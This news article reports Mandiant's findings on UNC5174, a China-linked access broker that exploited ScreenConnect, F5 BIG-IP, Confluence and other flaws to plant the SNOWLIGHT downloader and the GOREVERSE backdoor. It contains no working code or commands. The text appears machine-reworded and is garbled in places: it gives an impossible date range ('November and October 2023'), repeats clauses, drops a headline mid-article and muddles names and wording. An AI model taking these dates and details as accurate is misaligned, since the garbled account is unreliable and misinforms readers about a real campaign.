News, AntaraNews – A China-linked threat network exploited security vulnerabilities that were present in Connectwise ScreenConnect as well as F5 BIG-IP to create specific malware capable of providing more backdoors for affected Linux hosts in the context of an “aggressive” campaign.
Google’s Mandiant Mandiant, a subsidiary of Google, is monitoring the activities under its unclassified name UNC5174 (aka Uteus or Uetus) It describes the activity as the “former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China’s Ministry of State Security (MSS) focused on executing access operations.”
The threat suspect is believed to be responsible for orchestrating numerous attacks on Southeast Asian and U.S. universities and research organizations, Hong Kong businesses, charitable and non-governmental organisations (NGOs) in addition to U.S. and U.K. governments between the months of November and October 2023 then again in February 2024, using the ScreenConnect vulnerability.
The initial access to targeted environments can be made possible by exploitation of security vulnerabilities that are known to be present that are present in Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709) F5 BIG-IP (CVE-2023-46747), Linux Kernel (CVE-2022-0185) and Zyxel (CVE-2022-3052).
An effective foothold is followed by a thorough investigation and examination of all internet-facing systems for vulnerabilities in security as well as UNC5174 in addition to creating administrative user accounts for malicious purposes that require elevated privileges. This includes dropping an C-based ELF downloader, dubbed SNOWLIGHT.
China-Linked Group Breaches Networks via Connectwise, F5 Software Flaws
SNOWLIGHT was designed to download the payload for the next stage which is an opaque Golang backdoor, dubbed GOREVERSE and is downloaded from a remote URL. Then, it communicates through SUPERSHELL which is an open source command and control (C2) software that permits hackers to set up an reverse SSH tunnel and start interactive shell sessions in order to execute any program.
Another tool used by the attacker is a tunneling program based on Golang named GOHEAVY. This tool will likely be utilized to allow the lateral movement in compromised networks in addition to other applications like Afrog, DirBuster, Metasploit, Sliver, and sqlmap.
A unique incident was uncovered by the firm that monitors threat intelligence that has been uncovered by the firm, security actors were found to have applied mitigations to CVE-2023-46747, which is likely to be a way to block other rivals from exploiting this loophole in order to gain access.
“UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives ‘Dawn Calvary’ and has collaborated with ‘Genesis Day’ / ‘Xiaoqiying’ and ‘Teng Snake,’” Mandiant evaluated. “This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.”
There’s evidence that the threat actor could be an access broker in the beginning that has the backing of the MSS in light of their statements on forums for dark web. This is supported by reality that a number of U.S. defense and U.K. government organizations were attacked by a different access broker, dubbed UNC302.
These findings again highlight Chinese state-sponsored groups’ continued efforts to hack into edge devices through quickly incorporating zero-days, as well as newly disclosed weaknesses to carry out cyber-espionage on a massive size.
“UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, U.K. government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation,” Mandiant researchers reported.
“There are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.”
This comes at the time that the MSS warning the public that an unknown hacker from outside had hacked “hundreds” of Chinese business and government agencies by using email phishing and security flaws to compromise network security. The MSS did not disclose the name of the attacker or its the source of its operation.